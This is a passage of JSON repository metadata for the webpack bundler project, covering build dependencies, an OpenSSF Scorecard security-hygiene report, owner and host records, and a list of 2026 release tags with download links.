\u003c!nocheck\u003e, node-acorn (\u003e= 8.5.0+ds+~cs24.17.6~), node-babel7, node-browserslist \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-colorette, node-commander, node-enhanced-resolve \u003c!nocheck\u003e, node-es-module-lexer, node-eslint-scope \u003c!nocheck\u003e, node-eslint-visitor-keys, node-esrecurse \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-events \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-graceful-fs \u003c!nocheck\u003e, node-interpret (\u003e= 2.2~) \u003c!nocheck\u003e, node-json-parse-better-errors \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-mime-types \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-p-limit \u003c!nocheck\u003e, node-rechoir, node-resolve-cwd \u003c!nocheck\u003e, node-rollup-plugin-commonjs, node-rollup-plugin-json, node-rollup-plugin-node-resolve, node-rollup-plugin-terser, node-schema-utils \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-tapable (\u003e= 2.0~), node-typescript, node-watchpack \u003c!nocheck\u003e, node-webassemblyjs (\u003e= 1.9.1+dfsg+~cs11.9.35~) \u003c!nocheck\u003e, node-webpack-merge (\u003e= 5.8.0~), node-webpack-sources (\u003e= 3.2.1~) \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, rollup, terser \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-29T15:08:44.000Z","size":97455,"stargazers_count":65964,"open_issues_count":135,"forks_count":9523,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-29T15:15:16.900Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-29T14:54:50.000Z","dependencies_parsed_at":"2026-08-29T15:24:21.824Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":672,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36974490,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-08-29T02:00:05.978Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.110.1","sha":"0b2952e15bb1aa9a198acbbfdcb9a0dc1aabb5af","kind":"commit","published_at":"2026-08-27T20:00:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpa